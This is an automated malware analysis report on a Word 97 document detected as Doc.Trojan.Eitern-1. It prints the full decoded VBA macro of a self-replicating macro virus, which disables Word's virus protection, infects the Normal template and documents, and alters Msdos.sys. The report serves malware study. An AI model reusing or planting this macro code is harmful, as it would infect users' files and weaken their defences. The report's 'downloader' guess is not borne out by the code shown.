Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b193ac0c29b97592…

MALICIOUS

Office (OLE)

27.0 KB Created: 1999-06-10 06:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c69afd781a4ebde30b2bcdc5bb46d78e SHA-1: 8f83497e59ff0645c2d2fe0bf9999a6144217769 SHA-256: b193ac0c29b975926a4887879026b1d71fbf4d8705570ff7be4666fceb7128b3
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The macro attempts to write its own code to 'C:\Eitern.inf' and then likely execute it. The ClamAV detection of 'Doc.Trojan.Eitern-1' further supports the malicious classification. The macro's obfuscation and self-modification suggest a downloader or dropper functionality.

Heuristics 3

  • ClamAV: Doc.Trojan.Eitern-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Eitern-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4872 bytes
SHA-256: fab1f3df9a7c28c3bebd24daebe550646d320459e8da9d26066fc65ddd28e54a
Detection
ClamAV: Doc.Trojan.Eitern-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Open "C:\Eitern.inf" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
I = (MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(8, 1))
For X = 2 To Len(I): B$ = Asc(Mid(I, X, 1)) - 1: C$ = C$ & Chr(B$): Next X: A = C$
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Private Sub Document_Close()"
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 8, A
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 2, 6
'Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!DpnnboeCbst)#Uppmt#*/Dpouspmt)#Nbdsp#*/Efmfuf  Jg!Ebz)2*!Uifo;!TfuBuus!#D;]Ntept/tzt#-!wcOpsnbm;!Tztufn/QsjwbufQspgjmfTusjoh)#D;]Ntept/tzt#-!#Pqujpot#-!#CppuHVJ#*!>!#1#;!TfuBuus!#D;]Ntept/tzt#-!wcTztufn!,!wcIjeefo!,!wcSfbePomz  OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft  OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/TbwfBt!GjmfObnf!>!BdujwfEpdvnfou/GvmmObnf
End Sub

' Processing file: /opt/analyzer/scan_staging/23d79a50e4854923aa7124ab16b8b830.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3205 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	LitStr 0x000D "C:\Eitern.inf"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	PrintItemNL 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #2:
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #3:
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	Ld C$ 
' 	St A 
' Line #4:
' 	LitDI2 0x0001 
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #5:
' 	LitDI2 0x0008 
' 	Ld A 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #6:
' 	LitDI2 0x0002 
' 	LitDI2 0x0006 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #7:
' 	QuoteRem 0x0000 0x036D "Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!D
... (truncated)